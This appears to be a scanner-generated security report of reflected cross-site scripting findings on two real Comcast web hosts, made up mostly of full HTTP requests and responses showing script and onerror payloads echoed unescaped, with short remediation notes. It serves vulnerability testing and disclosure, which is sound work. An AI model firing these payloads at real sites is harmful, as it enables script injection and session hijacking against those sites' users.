HTTP/1.1 200 OK Date: Sun, 19 Dec 2010 18:13:22 GMT Server: Sun-ONE-Web-Server/6.1 Content-type: text/html;charset=utf-8 Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=NTLCBFvV0TtBGyktZLC8Cpcqv6pQF5YvJ4bLYvyLBrvVY9WPpp1R!96692442!NONE; path=/ Cache-Control: no-cache Connection: close Content-Length: 716
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html><head><title>Page Flow Error - Action Not Found</title></head><body><h1> ...[SNIP]... <td>com/comcast/online/dvp/presentation593da<script>alert(1)</script>3df36c0971c/pageflows/Login/authForward</td> ...[SNIP]...
The value of REST URL parameter 8 is copied into the HTML document as plain text between tags. The payload ccf40<script>alert(1)</script>5f3c611fd1b was submitted in the REST URL parameter 8. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflowsccf40<script>alert(1)</script>5f3c611fd1b/Login/authForward.do HTTP/1.1 Host: digitalvoice.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 19 Dec 2010 18:13:23 GMT Server: Sun-ONE-Web-Server/6.1 Content-type: text/html;charset=utf-8 Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=NTLDCKh5dhsLnJpQzVGdbxBhypmqxPlvN8nXxLphc40hhK63M1d1!-762166285!NONE; path=/ Cache-Control: no-cache Connection: close Content-Length: 716
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html><head><title>Page Flow Error - Action Not Found</title></head><body><h1> ...[SNIP]... <td>com/comcast/online/dvp/presentation/pageflowsccf40<script>alert(1)</script>5f3c611fd1b/Login/authForward</td> ...[SNIP]...
The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 9ebcc<script>alert(1)</script>7145250d0fb was submitted in the REST URL parameter 9. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login9ebcc<script>alert(1)</script>7145250d0fb/authForward.do HTTP/1.1 Host: digitalvoice.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 19 Dec 2010 18:13:24 GMT Server: Sun-ONE-Web-Server/6.1 Content-type: text/html;charset=utf-8 Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=NTLGJ0t925k4LGfzSv9KJgLZvp8GSmvK2Qm17zLpwB3gMqb8SNT2!1440925265!NONE; path=/ Cache-Control: no-cache Connection: close Content-Length: 716
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html><head><title>Page Flow Error - Action Not Found</title></head><body><h1> ...[SNIP]... <td>com/comcast/online/dvp/presentation/pageflows/Login9ebcc<script>alert(1)</script>7145250d0fb/authForward</td> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b5e48<script>alert(1)</script>3f458fc69de was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Comcast/DVPPortal/comb5e48<script>alert(1)</script>3f458fc69de/comcast/online/dvp/presentation/pageflows/Login/retrieveProfile.do HTTP/1.1 Host: digitalvoice.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 19 Dec 2010 18:07:48 GMT Server: Sun-ONE-Web-Server/6.1 Content-type: text/html;charset=utf-8 Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=NTJ0n7bqgh3SCLdr8Bl4nTXbxcrJJS3WwGhnRXMpBgtG0hqnGpTG!1720433980!NONE; path=/ Cache-Control: no-cache Connection: close Content-Length: 724
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html><head><title>Page Flow Error - Action Not Found</title></head><body><h1> ...[SNIP]... <td>comb5e48<script>alert(1)</script>3f458fc69de/comcast/online/dvp/presentation/pageflows/Login/retrieveProfile</td> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6cace<script>alert(1)</script>b153324f0b2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Comcast/DVPPortal/com/comcast6cace<script>alert(1)</script>b153324f0b2/online/dvp/presentation/pageflows/Login/retrieveProfile.do HTTP/1.1 Host: digitalvoice.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 19 Dec 2010 18:07:48 GMT Server: Sun-ONE-Web-Server/6.1 Content-type: text/html;charset=utf-8 Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=NTJ0p52J2YLphJQzvjn6FTv1cp2bRWLnzMwwRS13gQwSVJQJBLv5!255318197!NONE; path=/ Cache-Control: no-cache Connection: close Content-Length: 724
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html><head><title>Page Flow Error - Action Not Found</title></head><body><h1> ...[SNIP]... <td>com/comcast6cace<script>alert(1)</script>b153324f0b2/online/dvp/presentation/pageflows/Login/retrieveProfile</td> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload c0534<script>alert(1)</script>172078c0b3d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Comcast/DVPPortal/com/comcast/onlinec0534<script>alert(1)</script>172078c0b3d/dvp/presentation/pageflows/Login/retrieveProfile.do HTTP/1.1 Host: digitalvoice.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 19 Dec 2010 18:07:49 GMT Server: Sun-ONE-Web-Server/6.1 Content-type: text/html;charset=utf-8 Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=NTJ1CdjbT1DwVJxRtccGHqvK10Lst22t7mG6J4pqHP91jQ1xpMVn!715189861!NONE; path=/ Cache-Control: no-cache Connection: close Content-Length: 724
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html><head><title>Page Flow Error - Action Not Found</title></head><body><h1> ...[SNIP]... <td>com/comcast/onlinec0534<script>alert(1)</script>172078c0b3d/dvp/presentation/pageflows/Login/retrieveProfile</td> ...[SNIP]...
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 92a58<script>alert(1)</script>bc3efa62431 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Comcast/DVPPortal/com/comcast/online/dvp92a58<script>alert(1)</script>bc3efa62431/presentation/pageflows/Login/retrieveProfile.do HTTP/1.1 Host: digitalvoice.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 19 Dec 2010 18:07:50 GMT Server: Sun-ONE-Web-Server/6.1 Content-type: text/html;charset=utf-8 Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=NTJ2XPTsT4v53gHrGvVkMdxdJxJvWFDBJDbpvMdTMvDFQ2kpwpyW!739888278!NONE; path=/ Cache-Control: no-cache Connection: close Content-Length: 724
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html><head><title>Page Flow Error - Action Not Found</title></head><body><h1> ...[SNIP]... <td>com/comcast/online/dvp92a58<script>alert(1)</script>bc3efa62431/presentation/pageflows/Login/retrieveProfile</td> ...[SNIP]...
The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 6575b<script>alert(1)</script>7a29b212314 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Comcast/DVPPortal/com/comcast/online/dvp/presentation6575b<script>alert(1)</script>7a29b212314/pageflows/Login/retrieveProfile.do HTTP/1.1 Host: digitalvoice.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 19 Dec 2010 18:07:50 GMT Server: Sun-ONE-Web-Server/6.1 Content-type: text/html;charset=utf-8 Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=NTJ2KBT12YyTvcKwnw25vN2nJLrsGFPfhDWwhDnxL2crXn7cSmR7!96692442!NONE; path=/ Cache-Control: no-cache Connection: close Content-Length: 724
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html><head><title>Page Flow Error - Action Not Found</title></head><body><h1> ...[SNIP]... <td>com/comcast/online/dvp/presentation6575b<script>alert(1)</script>7a29b212314/pageflows/Login/retrieveProfile</td> ...[SNIP]...
The value of REST URL parameter 8 is copied into the HTML document as plain text between tags. The payload 9ef06<script>alert(1)</script>9e07f1fca61 was submitted in the REST URL parameter 8. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows9ef06<script>alert(1)</script>9e07f1fca61/Login/retrieveProfile.do HTTP/1.1 Host: digitalvoice.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 19 Dec 2010 18:07:51 GMT Server: Sun-ONE-Web-Server/6.1 Content-type: text/html;charset=utf-8 Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=NTJ3N1q4GLJdLQygnB9hvpMH2PtXsK6TvZjqKg4MJvDQWfzgvzTZ!-794401224!NONE; path=/ Cache-Control: no-cache Connection: close Content-Length: 724
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html><head><title>Page Flow Error - Action Not Found</title></head><body><h1> ...[SNIP]... <td>com/comcast/online/dvp/presentation/pageflows9ef06<script>alert(1)</script>9e07f1fca61/Login/retrieveProfile</td> ...[SNIP]...
The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload b6da7<script>alert(1)</script>89a6fcaa71e was submitted in the REST URL parameter 9. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Loginb6da7<script>alert(1)</script>89a6fcaa71e/retrieveProfile.do HTTP/1.1 Host: digitalvoice.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 19 Dec 2010 18:07:51 GMT Server: Sun-ONE-Web-Server/6.1 Content-type: text/html;charset=utf-8 Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=NTJ4bZFGbpQFyZhzMWdTJNg5Hqlj6nplKLpGWGBG52GV6mRKl4n3!1431461321!NONE; path=/ Cache-Control: no-cache Connection: close Content-Length: 724
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html><head><title>Page Flow Error - Action Not Found</title></head><body><h1> ...[SNIP]... <td>com/comcast/online/dvp/presentation/pageflows/Loginb6da7<script>alert(1)</script>89a6fcaa71e/retrieveProfile</td> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as text between NOSCRIPT tags. The payload cf871</noscript><script>alert(1)</script>4d1710b7efc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within NOSCRIPT tags does not prevent XSS attacks if the user is able to close the NOSCRIPT tag.
Request
GET /product_webgame.phpcf871</noscript><script>alert(1)</script>4d1710b7efc HTTP/1.1 Host: games.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html> <head> <title>404 Not Found</title> <script type='text/javascript'> function redirect() { document.location = 'http:/ ...[SNIP]... <p>The requested URL /product_webgame.phpcf871</noscript><script>alert(1)</script>4d1710b7efc was not found on this server.</p> ...[SNIP]...
2.42. http://games.comcast.net/product_webgame.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://games.comcast.net
Path:
/product_webgame.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as text between NOSCRIPT tags. The payload b01e2</noscript><script>alert(1)</script>694556b43e4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within NOSCRIPT tags does not prevent XSS attacks if the user is able to close the NOSCRIPT tag.
Request
GET /product_webgame.php/b01e2</noscript><script>alert(1)</script>694556b43e4 HTTP/1.1 Host: games.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html> <head> <title>404 Not Found</title> <script type='text/javascript'> function redirect() { document.location = 'http:/ ...[SNIP]... <p>The requested URL /product_webgame.php/b01e2</noscript><script>alert(1)</script>694556b43e4 was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as text between NOSCRIPT tags. The payload 3d790</noscript><script>alert(1)</script>7026214fdcc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within NOSCRIPT tags does not prevent XSS attacks if the user is able to close the NOSCRIPT tag.
Request
GET /3d790</noscript><script>alert(1)</script>7026214fdcc/s-1_1054_15254/AllGames/Hidden-Object/Victorian-Mysteries-Woman-in-White.html HTTP/1.1 Host: games.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html> <head> <title>404 Not Found</title> <script type='text/javascript'> function redirect() { document.location = 'http:/ ...[SNIP]... <p>The requested URL /3d790</noscript><script>alert(1)</script>7026214fdcc/s-1_1054_15254/AllGames/Hidden-Object/Victorian-Mysteries-Woman-in-White.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 629ec"><img%20src%3da%20onerror%3dalert(1)>3d0a426c30 was submitted in the REST URL parameter 1. This input was echoed as 629ec"><img src=a onerror=alert(1)>3d0a426c30 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /t_03cm629ec"><img%20src%3da%20onerror%3dalert(1)>3d0a426c30/s-1_1054_15254/AllGames/Hidden-Object/Victorian-Mysteries-Woman-in-White.html HTTP/1.1 Host: games.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the HTML document as text between NOSCRIPT tags. The payload 3f34f</noscript><script>alert(1)</script>d734ce584e1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within NOSCRIPT tags does not prevent XSS attacks if the user is able to close the NOSCRIPT tag.
Request
GET /t_03cm/s-1_1054_152543f34f</noscript><script>alert(1)</script>d734ce584e1/AllGames/Hidden-Object/Victorian-Mysteries-Woman-in-White.html HTTP/1.1 Host: games.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html> <head> <title>404 Not Found</title> <script type='text/javascript'> function redirect() { document.location = 'http:/ ...[SNIP]... <p>The requested URL /t_03cm/s-1_1054_152543f34f</noscript><script>alert(1)</script>d734ce584e1/AllGames/Hidden-Object/Victorian-Mysteries-Woman-in-White.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ffd8"><img%20src%3da%20onerror%3dalert(1)>9464f5786ed was submitted in the REST URL parameter 1. This input was echoed as 5ffd8"><img src=a onerror=alert(1)>9464f5786ed in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /t_03cm5ffd8"><img%20src%3da%20onerror%3dalert(1)>9464f5786ed/s1/DownloadableGames HTTP/1.1 Host: games.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-stri ...[SNIP]... <img src="http://cdn.media.trymedia.com/affiliate-files/t_03cm5ffd8"><img src=a onerror=alert(1)>9464f5786ed/images/GPpromo.gif" alt="GamePass - Get a FREE Game Now! Sign up for GamePass and receive a FREE game now, a FREE game every month and $5 off all additional GamePass games!" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as text between NOSCRIPT tags. The payload bc143</noscript><script>alert(1)</script>eef9c1bbfed was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within NOSCRIPT tags does not prevent XSS attacks if the user is able to close the NOSCRIPT tag.
Request
GET /bc143</noscript><script>alert(1)</script>eef9c1bbfed/s1/DownloadableGames HTTP/1.1 Host: games.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html> <head> <title>404 Not Found</title> <script type='text/javascript'> function redirect() { document.location = 'http:/ ...[SNIP]... <p>The requested URL /bc143</noscript><script>alert(1)</script>eef9c1bbfed/s1/DownloadableGames was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as text between NOSCRIPT tags. The payload b97f0</noscript><script>alert(1)</script>63f4f408e40 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within NOSCRIPT tags does not prevent XSS attacks if the user is able to close the NOSCRIPT tag.
Request
GET /t_03cm/s1b97f0</noscript><script>alert(1)</script>63f4f408e40/DownloadableGames HTTP/1.1 Host: games.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html> <head> <title>404 Not Found</title> <script type='text/javascript'> function redirect() { document.location = 'http:/ ...[SNIP]... <p>The requested URL /t_03cm/s1b97f0</noscript><script>alert(1)</script>63f4f408e40/DownloadableGames was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71d13"><img%20src%3da%20onerror%3dalert(1)>25e360604eb was submitted in the REST URL parameter 1. This input was echoed as 71d13"><img src=a onerror=alert(1)>25e360604eb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /t_03cm71d13"><img%20src%3da%20onerror%3dalert(1)>25e360604eb/s1_1050_13675/DownloadableGames/Puzzle/Atlantis-Bundle.html HTTP/1.1 Host: games.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the HTML document as text between NOSCRIPT tags. The payload cad9b</noscript><script>alert(1)</script>6d1d2cde714 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within NOSCRIPT tags does not prevent XSS attacks if the user is able to close the NOSCRIPT tag.
Request
GET /cad9b</noscript><script>alert(1)</script>6d1d2cde714/s1_1050_13675/DownloadableGames/Puzzle/Atlantis-Bundle.html HTTP/1.1 Host: games.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html> <head> <title>404 Not Found</title> <script type='text/javascript'> function redirect() { document.location = 'http:/ ...[SNIP]... <p>The requested URL /cad9b</noscript><script>alert(1)</script>6d1d2cde714/s1_1050_13675/DownloadableGames/Puzzle/Atlantis-Bundle.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as text between NOSCRIPT tags. The payload 23787</noscript><script>alert(1)</script>34b01fab478 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within NOSCRIPT tags does not prevent XSS attacks if the user is able to close the NOSCRIPT tag.
Request
GET /t_03cm/s1_1050_1367523787</noscript><script>alert(1)</script>34b01fab478/DownloadableGames/Puzzle/Atlantis-Bundle.html HTTP/1.1 Host: games.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html> <head> <title>404 Not Found</title> <script type='text/javascript'> function redirect() { document.location = 'http:/ ...[SNIP]... <p>The requested URL /t_03cm/s1_1050_1367523787</noscript><script>alert(1)</script>34b01fab478/DownloadableGames/Puzzle/Atlantis-Bundle.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3063"><img%20src%3da%20onerror%3dalert(1)>6a42dc0ab56 was submitted in the REST URL parameter 1. This input was echoed as f3063"><img src=a onerror=alert(1)>6a42dc0ab56 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /t_03cmf3063"><img%20src%3da%20onerror%3dalert(1)>6a42dc0ab56/s1_1052_14739/DownloadableGames/Action/Press-Your-LuckTM.html HTTP/1.1 Host: games.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the HTML document as text between NOSCRIPT tags. The payload e089a</noscript><script>alert(1)</script>951348d9f29 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within NOSCRIPT tags does not prevent XSS attacks if the user is able to close the NOSCRIPT tag.
Request
GET /e089a</noscript><script>alert(1)</script>951348d9f29/s1_1052_14739/DownloadableGames/Action/Press-Your-LuckTM.html HTTP/1.1 Host: games.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html> <head> <title>404 Not Found</title> <script type='text/javascript'> function redirect() { document.location = 'http:/ ...[SNIP]... <p>The requested URL /e089a</noscript><script>alert(1)</script>951348d9f29/s1_1052_14739/DownloadableGames/Action/Press-Your-LuckTM.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as text between NOSCRIPT tags. The payload eeb6a</noscript><script>alert(1)</script>c4670f56420 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within NOSCRIPT tags does not prevent XSS attacks if the user is able to close the NOSCRIPT tag.
Request
GET /t_03cm/s1_1052_14739eeb6a</noscript><script>alert(1)</script>c4670f56420/DownloadableGames/Action/Press-Your-LuckTM.html HTTP/1.1 Host: games.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html> <head> <title>404 Not Found</title> <script type='text/javascript'> function redirect() { document.location = 'http:/ ...[SNIP]... <p>The requested URL /t_03cm/s1_1052_14739eeb6a</noscript><script>alert(1)</script>c4670f56420/DownloadableGames/Action/Press-Your-LuckTM.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as text between NOSCRIPT tags. The payload 73e24</noscript><script>alert(1)</script>fec4c25f5cb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within NOSCRIPT tags does not prevent XSS attacks if the user is able to close the NOSCRIPT tag.
Request
GET /73e24</noscript><script>alert(1)</script>fec4c25f5cb/s2/WebGames HTTP/1.1 Host: games.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html> <head> <title>404 Not Found</title> <script type='text/javascript'> function redirect() { document.location = 'http:/ ...[SNIP]... <p>The requested URL /73e24</noscript><script>alert(1)</script>fec4c25f5cb/s2/WebGames was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as text between NOSCRIPT tags. The payload 8bce2</noscript><script>alert(1)</script>5b386e009e3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within NOSCRIPT tags does not prevent XSS attacks if the user is able to close the NOSCRIPT tag.
Request
GET /t_03cm/s28bce2</noscript><script>alert(1)</script>5b386e009e3/WebGames HTTP/1.1 Host: games.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html> <head> <title>404 Not Found</title> <script type='text/javascript'> function redirect() { document.location = 'http:/ ...[SNIP]... <p>The requested URL /t_03cm/s28bce2</noscript><script>alert(1)</script>5b386e009e3/WebGames was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as text between NOSCRIPT tags. The payload dc5c1</noscript><script>alert(1)</script>22c38537d71 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within NOSCRIPT tags does not prevent XSS attacks if the user is able to close the NOSCRIPT tag.
Request
GET /dc5c1</noscript><script>alert(1)</script>22c38537d71/s6/filter-casual/MacGames HTTP/1.1 Host: games.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
